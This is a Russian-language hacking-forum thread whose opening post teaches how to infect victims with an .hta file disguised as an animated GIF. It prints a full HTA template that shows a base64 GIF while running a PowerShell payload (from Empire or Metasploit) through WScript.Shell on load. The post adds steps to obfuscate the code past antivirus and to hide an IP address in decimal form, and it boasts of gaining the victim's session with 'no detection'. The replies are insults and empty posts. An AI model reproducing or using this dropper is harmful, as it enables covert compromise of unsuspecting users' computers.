Загрузка...

Заражение с помощью GIF.

Тема в разделе Вирусология создана пользователем gangstergang_inactive834656 27 янв 2019. 879 просмотров

  1. gangstergang_inactive834656
    gangstergang_inactive834656 Автор темы 27 янв 2019 Заблокирован(а) 99 19 янв 2019
    Всем привет, решил описать как мне кажется веселый метод заражения. Все будет как мы любим, весело, легко и без палевно.

    Поехали!

    Идем искать картинку (живую) то есть gif-ку... Была выбрана эта https://coub.com/view/kwse4
    Далее нам по требуется код:

    Генерируем powershell в Empire или Metasploit я выбрал...

    [IMG]

    КОД СКРИПТА:

    Код
    [/B]
    [LIST=1]
    [*][B]<html>[/B]
    [*][B]<head>[/B]
    [*][B] <title>NazvanieGif</title>[/B]
    [*][B] <hta:application id="NazvanieGif"[/B]
    [*][B] border="thin"[/B]
    [*][B] borderstyle="complex"[/B]
    [*][B] maximizeButton="no"[/B]
    [*][B] minimizeButton="no"[/B]
    [*][B] />[/B]
    [*][B]</head>[/B]
    [*][B]<script type="text/javascript">[/B]
    [*][B]var index = -1;[/B]
    [*][B]var images = [[/B]
    [*][B] "data:image/gif;base64,"];[/B]
    [*][B]function initGallery(){[/B]
    [*][B] window.resizeTo(300,300);[/B]
    [*][B] htaPayload();[/B]
    [*][B] nextPicture();[/B]
    [*][B]}[/B]
    [*][B]function nextPicture(){[/B]
    [*][B] var img;[/B]
    [*][B] index = index + 1;[/B]
    [*][B] if (index > images.length -1 ){[/B]
    [*][B] index = 0;[/B]
    [*][B] }[/B]
    [*][B] img = document.getElementById("gallery");[/B]
    [*][B] img.src = images[index];[/B]
    [*][B]}[/B]
    [*][B]function htaPayload(){[/B]
    [*][B] var payload="";[/B]
    [*][B] try{[/B]
    [*][B] if (navigator.userAgent.indexOf("Windows") !== -1){[/B]
    [*][B] new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);[/B]
    [*][B] }[/B]
    [*][B] }[/B]
    [*][B] catch(e){[/B]
    [*][B] }[/B]
    [*][B]}[/B]
    [*][B]</script>[/B]
    [*][B]<style>[/B]
    [*][B]#gallery, div {[/B]
    [*][B] width: 100%;[/B]
    [*][B] height: 100%;[/B]
    [*][B]}[/B]
    [*][B]#outer {[/B]
    [*][B] text-align: center;[/B]
    [*][B]}[/B]
    [*][B]#inner{[/B]
    [*][B] display: inline-block;[/B]
    [*][B]}[/B]
    [*][B]body {[/B]
    [*][B] background-color: black;[/B]
    [*][B]}[/B]
    [*][B]</style>[/B]
    [*][B]<body onload="initGallery()">[/B]
    [*][B] <div id="outer">[/B]
    [*][B] <div id="inner">[/B]
    [*][B] <img id="gallery" onclick="nextPicture()">[/B]
    [*][B] </div>[/B]
    [*][B] </div>[/B]
    [*][B]</body>[/B]
    [*][B]</html>[/B]
    [/LIST]
    [B]

    И вставляем в 37 строчку, между:

    [IMG]

    далее переходим на очень полезный онлайн ресурсhttps://www.browserling.com/tools/image-to-base64 Иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последующего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1

    127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433

    Так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в
    [IMG]

    [IMG]

    Как видите в 17 строку)

    Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе http://www.newfreeware.com/webmaster/526/

    [IMG]

    Сохраняем полученный код в блокноте, под любым именем но в формате .hta < -

    Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!!

    Просьба, не тестить!!!


     
  2. valetik_inactive218543
    вы заибали с телег все пиздить и сюда скидывать
     
  3. bigwins_inactive111518
    bigwins_inactive111518 24 фев 2019 Заблокирован(а) 0 10 май 2017
  4. SrgB
    SrgB 27 фев 2019 0 23 дек 2018
  5. SrgB
    SrgB 27 фев 2019 0 23 дек 2018
Загрузка...
Top